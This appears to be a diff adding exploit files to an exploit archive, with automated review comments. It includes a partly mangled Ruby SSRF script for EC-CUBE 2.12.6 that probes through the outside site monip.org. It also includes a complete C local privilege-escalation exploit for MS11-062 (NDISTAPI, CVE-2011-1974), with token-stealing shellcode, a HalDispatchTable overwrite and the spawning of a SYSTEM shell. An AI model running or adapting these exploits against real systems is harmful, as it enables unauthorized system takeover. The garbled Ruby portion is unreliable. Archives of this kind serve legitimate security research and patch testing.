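Review bot: The title and Impact line say "Insecure Configuration Management", but what the PoC actually describes is narrower and more serious — requesting `admin.htm` directly after the redirect to `login.asp` returns the admin configuration form without credentials, which is a missing server-side authorization check (forced browsing / authentication bypass) and should be named as such. The PoC stops at "you get the Form"; it does not say whether submitting that form without a session persists the change, which is what "we can change the Admin configuration" claims, so a captured request and response, or at least the observed result, is needed to make the claim verifiable. "Affected Version" lists models (EDR-810, EDR-G902, EDR-G903) rather than firmware versions and "Tested On: Linux // Dist (Bugtraq 2)" describes the attacker host, so the tested firmware version is missing; together with "Vendor Status: I told them and i wait for the answer" this is an unconfirmed, unfixed issue and the advisory should say so explicitly.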
@@ -0,0 +1,89 @@ +# Exploit Title: EC-CUBE 2.12.6 Server-Side Request Forgery +# Date: 22/10/16 +# Exploit Author: Wad Deek +# Vendor Homepage: http://en.ec-cube.net/ +# Software Link: http://en.ec-cube.net/download/ +# Version: 2.12.6en-p1 +# Tested on: Xampp on Windows7 +# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools +## +## +#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +require('mechanize') +agent = Mechanize.new() +agent.read_timeout = 3 +agent.open_timeout = 3 +agent.keep_alive = false +agent.redirect_ok = true +agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE +#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +#=========================== +urls = < 4111111111111111, +"arg_key0" => 1, +"arg_key1" => 1, +"arg_key2" => 1, +"arg_key3" => 1, +"arg_key4" => 1, +"arg_key5" => 1, +"arg_key6" => 1, +"arg_key7" => 1, +"arg_key8" => 1, +"arg_key9" => 1, +"arg_val0" => 1, +"arg_val1" => 1, +"arg_val2" => 1, +"arg_val3" => 1, +"arg_val4" => 1, +"arg_val5" => 1, +"arg_val6" => 1, +"arg_val7" => 1, +"arg_val8" => 1, +"arg_val9" => 1, +#???????????????????????????????????????????????????????????? +"EndPoint" => "http://www.monip.org/index.php"+"?.jpg", +#???????????????????????????????????????????????????????????? +"mode=" => "", +"Operation" => 1, +"SecretKey" => 1, +"Service" => 1, +"Signature" => 1, +"Timestamp" => 1, +"type" => "index.php" +}) +body = response.body() +rescue +else +ip = response.body().scan(/IP : (.+?)>>> monip.org >>>> "+ip) +end +end +#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} +#=========================== +end +#=========================== + diff --git a/platforms/windows/local/40627.c b/platforms/windows/local/40627.c new file mode 100755 index 000000000..510de17ad --- /dev/null +++ b/platforms/windows/local/40627.c 
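Review bot: The file is stored as `40628.pl` and indexed as Perl, but its body is Ruby (`require('mechanize')`, `Mechanize.new()`, `OpenSSL::SSL::VERIFY_NONE`, `rescue`/`end`), so it should be renamed to `40628.rb` and the files.csv path updated. In this copy the request-building part appears truncated — `urls = < 4111111111111111,` looks like the remains of a heredoc and of the `agent.post(...)` call whose parameter hash continues at `"arg_key0" => 1`, and `scan(/IP : (.+?)>>> monip.org >>>> "+ip)` is likewise mangled — so the script will not parse as stored and the original lines need restoring before it is usable. The SSRF proof also exfiltrates through the third-party `http://www.monip.org/index.php?.jpg` endpoint, which discloses every tested target to that site and depends on its response format; pointing `EndPoint` at a listener the tester controls, and noting that `VERIFY_NONE` disables TLS verification for the target connection, would make a cleaner PoC.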
@@ -0,0 +1,538 @@ +/* +################################################################ +# Exploit Title: Windows x86 (all versions) NDISTAPI privilege escalation (MS11-062) +# Date: 2016-10-24 +# Exploit Author: Tomislav Paskalev +# Vulnerable Software: +# Windows XP SP3 x86 +# Windows XP Pro SP2 x64 +# Windows Server 2003 SP2 x86 +# Windows Server 2003 SP2 x64 +# Windows Server 2003 SP2 Itanium-based Systems +# Supported Vulnerable Software: +# Windows XP SP3 x86 +# Windows Server 2003 SP2 x86 +# Tested Software: +# Windows XP Pro SP3 x86 EN [5.1.2600] +# Windows Server 2003 Ent SP2 EN [5.2.3790] +# CVE ID: 2011-1974 +################################################################ +# Vulnerability description: +# An elevation of privilege vulnerability exists in the +# NDISTAPI.sys component of the Remote Access Service NDISTAPI +# driver. The vulnerability is caused when the NDISTAPI driver +# improperly validates user-supplied input when passing data +# from user mode to the Windows kernel. +# An attacker must have valid logon credentials and be able to +# log on locally to exploit the vulnerability. +# An attacker who successfully exploited this vulnerability could +# run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM +# privileges). 
+################################################################ +# Exploit notes: +# Privileged shell execution: +# - the SYSTEM shell will spawn within the invoking shell/process +# Exploit compiling (Kali GNU/Linux Rolling 64-bit): +# - # i686-w64-mingw32-gcc MS11-062.c -o MS11-062.exe -lws2_32 +# Exploit prerequisites: +# - low privilege access to the target OS +# - target OS not patched (KB2566454) +# - Remote Access Service (RAS) running +# - sc query remoteaccess +# - sc start remoteaccess +################################################################ +# Patches: +# Windows XP SP3 x86 +# WindowsXP-KB2566454-x86-enu.exe +# (not available - EoL) +# Windows Server 2003 SP2 x86 +# WindowsServer2003-KB2566454-x86-enu.exe +# https://www.microsoft.com/en-us/download/details.aspx?id=27093 +################################################################ +# Thanks to: +# Ni Tao (writeup) +# Google Translate (Chinese -> Engrish) +################################################################ +# References: +# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1974 +# https://technet.microsoft.com/en-us/library/security/ms11-062.aspx +# http://www.cas.stc.sh.cn/jsjyup/pdf/2015/5/%E5%9F%BA%E4%BA%8E%E9%9D%99%E6%80%81%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF%E7%9A%84%E8%BD%AF%E4%BB%B6%E5%86%85%E6%A0%B8%E9%A9%B1%E5%8A%A8%E5%AE%89%E5%85%A8%E6%80%A7%E6%A3%80%E6%B5%8B.pdf +# https://translate.google.com/ +################################################################ +*/ + + +#include +#include +#include +#include + +#pragma comment (lib, "ws2_32.lib") + + +//////////////////////////////////////////////////////////////// +// DEFINE DATA TYPES +//////////////////////////////////////////////////////////////// + +typedef enum _KPROFILE_SOURCE { + ProfileTime, + ProfileAlignmentFixup, + ProfileTotalIssues, + ProfilePipelineDry, + ProfileLoadInstructions, + ProfilePipelineFrozen, + ProfileBranchInstructions, + ProfileTotalNonissues, + 
ProfileDcacheMisses, + ProfileIcacheMisses, + ProfileCacheMisses, + ProfileBranchMispredictions, + ProfileStoreInstructions, + ProfileFpInstructions, + ProfileIntegerInstructions, + Profile2Issue, + Profile3Issue, + Profile4Issue, + ProfileSpecialInstructions, + ProfileTotalCycles, + ProfileIcacheIssues, + ProfileDcacheAccesses, + ProfileMemoryBarrierCycles, + ProfileLoadLinkedIssues, + ProfileMaximum +} KPROFILE_SOURCE, *PKPROFILE_SOURCE; + + +typedef DWORD (WINAPI *PNTQUERYINTERVAL) ( + KPROFILE_SOURCE ProfileSource, + PULONG Interval +); + + +typedef LONG NTSTATUS; + + +typedef NTSTATUS (WINAPI *PNTALLOCATE) ( + HANDLE ProcessHandle, + PVOID *BaseAddress, + ULONG ZeroBits, + PULONG RegionSize, + ULONG AllocationType, + ULONG Protect +); + + +typedef struct _SYSTEM_MODULE_INFORMATION { + ULONG Reserved[2]; + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT Index; + USHORT Unknown; + USHORT LoadCount; + USHORT ModuleNameOffset; + CHAR ImageName[256]; +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + + +typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL); + + +//////////////////////////////////////////////////////////////// +// FUNCTIONS +//////////////////////////////////////////////////////////////// + +BOOL IsWow64() +{ + BOOL bIsWow64 = FALSE; + LPFN_ISWOW64PROCESS fnIsWow64Process; + + fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(GetModuleHandle(TEXT("kernel32")), "IsWow64Process"); + + if(NULL != fnIsWow64Process) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx + if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64)) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + printf(" [-] Failed (error code: %d)\n", GetLastError()); + return -1; + } + } + return bIsWow64; +} + + +//////////////////////////////////////////////////////////////// +// MAIN FUNCTION +//////////////////////////////////////////////////////////////// + +int main(void) +{ + 
printf("[*] MS11-062 (CVE-2011-1974) x86 exploit\n"); + printf(" [*] by Tomislav Paskalev\n"); + + + //////////////////////////////////////////////////////////////// + // IDENTIFY TARGET OS ARCHITECTURE AND VERSION + //////////////////////////////////////////////////////////////// + + printf("[*] Identifying OS\n"); + + + // identify target machine's OS architecture + // in case the target machine is running a 64-bit OS + if(IsWow64()) + { + printf(" [-] 64-bit\n"); + return -1; + } + + printf(" [+] 32-bit\n"); + + + // identify target machine's OS version + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx + OSVERSIONINFOEX osvi; + ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX)); + osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); + GetVersionEx((LPOSVERSIONINFO) &osvi); + + // define operating system version specific variables + unsigned char shellcode_KPROCESS; + unsigned char shellcode_TOKEN; + unsigned char shellcode_UPID; + unsigned char shellcode_APLINKS; + const char **securityPatchesPtr; + int securityPatchesCount; + + //////////////////////////////////////////////////////////////// + /* + OS VERSION SPECIFIC OFFSETS + + references: + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/original.htm + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/late52.htm + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/current.htm + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/ + */ + //////////////////////////////////////////////////////////////// + + // in case the OS version is 5.1, service pack 3 + if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 3)) + { + // the target machine's OS is Windows XP SP3 + printf(" [+] Windows XP 
SP3\n"); + shellcode_KPROCESS = '\x44'; + shellcode_TOKEN = '\xC8'; + shellcode_UPID = '\x84'; + shellcode_APLINKS = '\x88'; + const char *securityPatches[] = {"KB2566454"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 1; + } + + // in case the OS version is 5.2, service pack 2, not R2 + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724385(v=vs.85).aspx + else if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 2) && (osvi.wServicePackMajor == 2) && (GetSystemMetrics(89) == 0)) + { + // the target machine's OS is Windows Server 2003 SP2 + printf(" [+] Windows Server 2003 SP2\n"); + shellcode_KPROCESS = '\x38'; + shellcode_TOKEN = '\xD8'; + shellcode_UPID = '\x94'; + shellcode_APLINKS = '\x98'; + const char *securityPatches[] = {"KB2566454"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 1; + } + + // in case the OS version is not any of the previously checked versions + else + { + // the target machine's OS is an unsupported 32-bit Windows version + printf(" [-] Unsupported version\n"); + printf(" [*] Affected 32-bit operating systems\n"); + printf(" [*] Windows XP SP3\n"); + printf(" [*] Windows Server 2003 SP2\n"); + return -1; + } + + + //////////////////////////////////////////////////////////////// + // LOCATE REQUIRED OS COMPONENTS + //////////////////////////////////////////////////////////////// + + printf("[*] Locating required OS components\n"); + + + // retrieve system information + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms725506(v=vs.85).aspx + // locate "ZwQuerySystemInformation" in the "ntdll.dll" module + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx + FARPROC ZwQuerySystemInformation; + ZwQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation"); + + // 11 = SystemModuleInformation + // http://winformx.florian-rappl.de/html/e6d5d5c1-8d83-199b-004f-8767439c70eb.htm + ULONG systemInformation; + 
ZwQuerySystemInformation(11, (PVOID) &systemInformation, 0, &systemInformation); + + // allocate memory for the list of loaded modules + ULONG *systemInformationBuffer; + systemInformationBuffer = (ULONG *) malloc(systemInformation * sizeof(*systemInformationBuffer)); + + if(!systemInformationBuffer) + { + printf(" [-] Could not allocate memory"); + return -1; + } + + + // retrieve the list of loaded modules + ZwQuerySystemInformation(11, systemInformationBuffer, systemInformation * sizeof(*systemInformationBuffer), NULL); + + // locate "ntkrnlpa.exe" or "ntoskrnl.exe" in the retrieved list of loaded modules + ULONG i; + PVOID targetKrnlMdlBaseAddr; + HMODULE targetKrnlMdlUsrSpcOffs; + BOOL foundModule = FALSE; + PSYSTEM_MODULE_INFORMATION loadedMdlStructPtr; + loadedMdlStructPtr = (PSYSTEM_MODULE_INFORMATION) (systemInformationBuffer + 1); + + for(i = 0; i < *systemInformationBuffer; i++) + { + if(strstr(loadedMdlStructPtr[i].ImageName, "ntkrnlpa.exe")) + { + printf(" [+] ntkrnlpa.exe\n"); + targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntkrnlpa.exe", 0, 1); + targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base; + foundModule = TRUE; + break; + } + else if(strstr(loadedMdlStructPtr[i].ImageName, "ntoskrnl.exe")) + { + printf(" [+] ntoskrnl.exe\n"); + targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntoskrnl.exe", 0, 1); + targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base; + foundModule = TRUE; + break; + } + } + + // base address of the loaded module (kernel space) + printf(" [*] Address: %#010x\n", targetKrnlMdlBaseAddr); + + // offset address (relative to the parent process) of the loaded module (user space) + printf(" [*] Offset: %#010x\n", targetKrnlMdlUsrSpcOffs); + + if(!foundModule) + { + printf(" [-] Could not find ntkrnlpa.exe/ntoskrnl.exe\n"); + return -1; + } + + // free allocated buffer space + free(systemInformationBuffer); + + + // determine the address of the "HalDispatchTable" process (kernel space) + // locate the offset fo the "HalDispatchTable" process 
within the target module (user space)
+ ULONG_PTR HalDispatchTableUsrSpcOffs;
+ HalDispatchTableUsrSpcOffs = (ULONG_PTR) GetProcAddress(targetKrnlMdlUsrSpcOffs, "HalDispatchTable");
+
+ if(!HalDispatchTableUsrSpcOffs)
+ {
+ printf(" [-] Could not find HalDispatchTable\n");
+ return -1;
+ }
+
+ printf(" [+] HalDispatchTable\n");
+ printf(" [*] Offset: %#010x\n", HalDispatchTableUsrSpcOffs);
+
+ // calculate the address of "HalDispatchTable" in kernel space
+ // 1. identify the base address of the target module in kernel space
+ // 2. previous step's result [minus] the load address of the same module in user space
+ // 3. previous step's result [plus] the address of "HalDispatchTable" in user space
+ // EQUIVALENT TO:
+ // 1. determine RVA of HalDispatchTable
+ // *Relative Virtual Address - the address of an item after it is loaded into memory, with the base address of the image file subtracted from it.
+ // 2. previous step's result [plus] base address of target module in kernel space
+ ULONG_PTR HalDispatchTableKrnlSpcAddr;
+ HalDispatchTableKrnlSpcAddr = HalDispatchTableUsrSpcOffs - (ULONG_PTR) targetKrnlMdlUsrSpcOffs;
+ HalDispatchTableKrnlSpcAddr += (ULONG_PTR) targetKrnlMdlBaseAddr;
+
+
+ // locate "NtQueryIntervalProfile" in the "ntdll.dll" module
+ PNTQUERYINTERVAL NtQueryIntervalProfile;
+ NtQueryIntervalProfile = (PNTQUERYINTERVAL) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
+
+ if(!NtQueryIntervalProfile)
+ {
+ printf(" [-] Could not find NtQueryIntervalProfile\n");
+ return -1;
+ }
+
+ printf(" [+] NtQueryIntervalProfile\n");
+ printf(" [*] Address: %#010x\n", NtQueryIntervalProfile);
+
+
+ ////////////////////////////////////////////////////////////////
+ // CREATE TOKEN STEALING SHELLCODE
+ ////////////////////////////////////////////////////////////////
+
+ printf("[*] Creating token stealing shellcode\n");
+
+
+ // construct the token stealing shellcode
+ unsigned char shellcode[] =
+ {
+ 0x52, // PUSH EDX Save EDX on the stack (save context)
+ 0x53, // PUSH EBX Save EBX on the stack (save context)
+ 0x33,0xC0, // XOR EAX, EAX Zero out EAX (EAX = 0)
+ 0x64,0x8B,0x80,0x24,0x01,0x00,0x00, // MOV EAX, FS:[EAX+0x124] Retrieve current _KTHREAD structure
+ 0x8B,0x40,shellcode_KPROCESS, // MOV EAX, [EAX+_KPROCESS] Retrieve _EPROCESS structure
+ 0x8B,0xC8, // MOV ECX, EAX Copy EAX (_EPROCESS) to ECX
+ 0x8B,0x98,shellcode_TOKEN,0x00,0x00,0x00, // MOV EBX, [EAX+_TOKEN] Retrieve current _TOKEN
+ 0x8B,0x80,shellcode_APLINKS,0x00,0x00,0x00, // MOV EAX, [EAX+_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
+ 0x81,0xE8,shellcode_APLINKS,0x00,0x00,0x00, // SUB EAX, _APLINKS | Retrieve EPROCESS from ActiveProcessLinks
+ 0x81,0xB8,shellcode_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // CMP [EAX+_UPID], 0x4 | Compare UniqueProcessId with 4 (System Process)
+ 0x75,0xE8, // JNZ/JNE ---- Jump if not zero/not equal
+ 0x8B,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV EDX, [EAX+_TOKEN] Copy SYSTEM _TOKEN to EDX
+ 0x8B,0xC1, // MOV EAX, ECX Copy ECX (current process _TOKEN) to EAX
+ 0x89,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV [EAX+_TOKEN], EDX Copy SYSTEM _TOKEN to current process _TOKEN
+ 0x5B, // POP EBX Pop current stack value to EBX (restore context)
+ 0x5A, // POP EDX Pop current stack value to EDX (restore context)
+ 0xC2,0x08 // RET 8 Return
+ };
+
+ printf(" [*] Shellcode assembled\n");
+
+
+ // allocate memory (RWE permissions) for the shellcode
+ printf(" [*] Allocating memory\n");
+ LPVOID shellcodeAddress;
+ shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+ if(shellcodeAddress == NULL)
+ {
+ // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
+ printf(" [-] Failed (error code: %d)\n", GetLastError());
+ return -1;
+ }
+
+ printf(" [+] Address: %#010x\n", shellcodeAddress);
+
+
+ // copy the shellcode to the allocated memory
+ memcpy((shellcodeAddress), shellcode, sizeof(shellcode));
+ printf(" [*] Shellcode copied\n");
+
+
+ ////////////////////////////////////////////////////////////////
+ // EXPLOIT THE VULNERABILITY
+ ////////////////////////////////////////////////////////////////
+
+ printf("[*] Exploiting vulnerability\n");
+
+
+ // open the vulnerable device driver
+ HANDLE targetDeviceHandle;
+ ULONG dwReturnSize;
+ int errorCode = 0;
+
+ printf(" [*] Opening NDISTAPI device driver\n");
+ // https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx
+ targetDeviceHandle = CreateFile("\\\\.\\NDISTAPI", GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
+
+ // in case the function fails
+ if(targetDeviceHandle == INVALID_HANDLE_VALUE)
+ {
+ // the device driver was not opened successfully
+ // https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx
+ errorCode = GetLastError();
+ // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
+ // in case of ERROR_FILE_NOT_FOUND
+ if(errorCode == 2)
+ {
+ // the vulnerable service is not running
+ printf(" [!] Remote Access Service not started\n");
+ printf(" [*] run \"sc start remoteaccess\"\n");
+ return -1;
+ }
+ // in case of any other error message
+ else
+ {
+ printf(" [-] Failed (error code: %d)\n", errorCode);
+ return -1;
+ }
+ }
+ // in case the function succeeds
+ else
+ {
+ // the device driver was opened succesfully
+ printf(" [+] Done\n");
+ }
+
+
+ // copy the shellcode address to the input buffer
+ unsigned char InputBuffer[8]={0};
+ memcpy((InputBuffer + 4), &shellcodeAddress, sizeof(shellcodeAddress));
+
+
+ // trigger vulnerability (cause arbitrary memory overwrite)
+ printf(" [*] Calling vulnerable function\n");
+ if(DeviceIoControl(
+ targetDeviceHandle,
+ 0x8fff23d4, // DoLineCreateWork
+ (PVOID) InputBuffer, sizeof(InputBuffer),
+ (PVOID) (HalDispatchTableKrnlSpcAddr), 0,
+ &dwReturnSize, NULL
+ ) == 0)
+ {
+ // https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx
+ errorCode = GetLastError();
+ // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
+ // in case of ERROR_INSUFFICIENT_BUFFER
+ if(errorCode == 122)
+ {
+ // target is patched
+ printf(" [!] Target patched\n");
+ printf(" [*] Possible security patches\n");
+ for(i = 0; i < securityPatchesCount; i++)
+ printf(" [*] %s\n", securityPatchesPtr[i]);
+ return -1;
+ }
+ // in case of any other error message
+ else
+ {
+ // print the error code
+ printf(" [-] Failed (error code: %d)\n", errorCode);
+ return -1;
+ }
+ }
+ else
+ printf(" [+] Done\n");
+
+
+ // elevate privileges of the current process
+ printf(" [*] Elevating privileges to SYSTEM\n");
+ ULONG outInterval = 0;
+ // https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProfile%2FNtQueryIntervalProfile.html
+ NtQueryIntervalProfile(2, &outInterval);
+ printf(" [+] Done\n");
+
+
+ // spawn shell (with elevated privileges)
+ printf(" [*] Spawning shell\n");
+ // spawn SYSTEM shell within the current shell (remote shell friendly)
+ system ("c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32");
+
+ // exit
+ printf("\n[*] Exiting SYSTEM shell\n");
+ return 1;
+}
+
+// EoF